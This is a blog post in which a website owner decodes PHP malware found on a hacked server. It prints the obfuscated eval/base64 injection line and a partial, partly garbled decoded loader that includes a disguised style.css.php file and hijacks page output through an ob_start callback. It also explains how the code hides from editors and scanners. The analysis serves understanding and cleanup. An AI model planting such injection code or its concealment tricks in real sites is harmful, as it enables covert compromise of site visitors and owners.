Hacking the Code

Last Post i was talking about how to clean up a hacked web server, hopeful your server is clean now and you can get back to what you do best. But what was the hacker trying to do? What does that long string mean? I will tell you how to decode the string the safe way, and understand how it was constructed.

The Example that I am going to use is from a real hacked website, the code that I will display is only partial but the construct will be complete. Any identifiable URLs will be changed to prevent identification and your safety.
Lets start by identifying the code, this is what i had found at the very beginning of the page.
<? /**/eval(base64_decode(aWYoZnVuY3Rpb25<–>KTt9fX0=)); ?>

lets start with /**/, it looks innocent but its a way to hide the code, what the code usually used for is large blocks of comments instead of using // on each line you would start it with /* and  end with */ but what i noticed is that in bluefish and notepad++ when these are highlighted the whole line appears to be a comment, my guess is that other code scanners will look like one long comment  on that line and skip it. But this is just my conclusion and testing, very clever way to use comments.

almost forgot the first thing to notice is the use of short tags(<?) that they use, on my personal server I have short tags disabled, I had learned that it should be disabled for security purposes, I don’t know if this holds true today. but the reason they use it is it helps hide it as a comment adding php to   it (<?php),makes it show up as php code not a comment, now its starting to unravel………

evalEvaluate a string as PHP code

very simple right, they need something to run there code, eval does this trick, you can even add html to the string. just another peice of the pie.

base64_decode – it decodes base64 code, now what is base64? It was originally for email to send binary data in emails, and other uses like binary data in urls and other variables but newest use is hiding php code in a long string, the string was 2692 characters long. So what did that string have in it.

There is a lot of code i took out of these strings, the variables where 32 characters long each, and would have made this code even more cryptice than this slightly smaller version, but first lets go over the code line by line and find out what its doing.

if(function_exists(‘ob_start’)&&!isset($GLOBALS[‘sh_no’])){$GLOBALS[‘sh_no’]=1;
if(file_exists(‘/home/content/<—–>/admin/includes/languages/english/images/buttons/style.css.php’)){
include_once(‘/home/content/<——>/admin/includes/languages/english/images/buttons/style.css.php’);
if(function_exists(‘gml’)&&!function_exists(‘dgobh’)){
if(!function_exists(‘gzdecode’)){
function gzdecode($R20FD)
{$R6B6=ord(substr($R20FD,3,1));
$R6016=10;
$R0D54=0;
if($R6B6E&4)
{$R0D54=unpack(‘v’,substr($R20FD,10,2));
$R0D542=$R0D542[1];
$R6016+=2+$R0D542;}
if($R6B6E&8){$R60169=strpos($R20FD,chr(0),$R60169)+1;}
if($R6B6E98&16){$R60169=strpos($R20FD,chr(0),$R60169)+1;}
if($R6B6E98&2){$R60169+=2;}
$RC4A5B=gzinflate(substr($R20FD,$R60169));
if($RC4A5B===FALSE){$RC4A5B=$R20FD;}
return $RC4A5B;
}}
function dgobh($RDA3E){Header(‘Content-Encoding: none’);
$R3E33=gzdecode($RDA3E);
if(preg_match(‘/]*>)/si’,’$1′.gml(),$R3E33);}
else{
return gml().$R3E33;
}}
ob_start(‘dgobh’);
}}}

if(function_exists(‘ob_start’)&&!isset($GLOBALS[‘sh_no’])){$GLOBALS[‘sh_no’]=1; is the first line, and it starts by looking for ob_start, this functions is used to store items into a buffer, it can be used to store variables and strings, and then send them to the browser, but they are looking for it, next they are seeing if a global variable called ‘sho_no’ i am sure what this variable check is for but it sets it to 1 if it doesn’t exist. As a side note i will not be going into the logic, until all the functions are under stood.

After that it looks for style.css.php and if it exist include it, we will look into that file a little later, next is the gzdecode function, if it exists wonderful, and if it doesn’t it will make it. so what is gzdecode well the obvious answer would be it decodes gzencoded strings and files, and thats what they have done is encoded more strings but now with a different code, damn there getting tricky.

now the last great tidbit before going into the other files

function dgobh($RDA3E){Header(‘Content-Encoding: none’);
$R3E33=gzdecode($RDA3E);
if(preg_match( ‘/]*>)/si’ , ‘$1’.gml() , $R3E33);}
else{
return gml().$R3E33;
}}
ob_start(‘dgobh’);
}}}

now the function dgobh first changes the encoding to none which I am not too familer with, I will look into it and update later. Then it decodes its input, most likely a string, it runs next preg_match, it searches through a string and matches the regular expression, and one of my weak points is regualr expression. We also need to find out what gml() does and what it is returning.after that it sends dgobh to the buffer for use later on. There is more to this code than what i have currently, I will update some more as soon as i get the other file.